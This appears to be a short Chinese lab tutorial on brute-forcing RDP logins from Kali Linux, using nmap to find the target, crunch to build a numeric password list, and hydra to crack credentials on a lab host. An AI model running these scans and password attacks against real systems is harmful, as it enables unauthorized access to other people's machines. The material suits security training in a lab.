一、實驗環境
Linux kali
目标主機 IP
192.168.31.22
先用nmap掃描目标主機開放的端口
nmap 192.168.31.22
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-23 19:14 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.07 seconds
如果出現檢測不到目标主機的情況,就用下面的指令
nmap -PN -sT 192.168.31.22
kali的字典存放目錄
/usr/share/wordlists/dirbuster
這個目錄有部分可供使用的字典,但我們可以更有針對性的制作字典。
crunch 1 4 1234567890 -o password1.txt
生成長度為1-4的數字密碼,将結果輸出到password1.txt中
hydra [目标主機IP] rdp -L [使用者名字典] -P[密碼字典] -V -F
-V 顯示爆破過程
-F 遇到正确的使用者名及密碼停止爆破
hydra 192.168.31.22 rdp -L /usr/share/wordlists/dirbuster/password2.txt -P /usr/share/wordlists/dirbuster/password1.txt -V -F
使用者名:PC 密碼:1
做實驗才弄怎麼簡單的密碼,現實生活中要爆破很久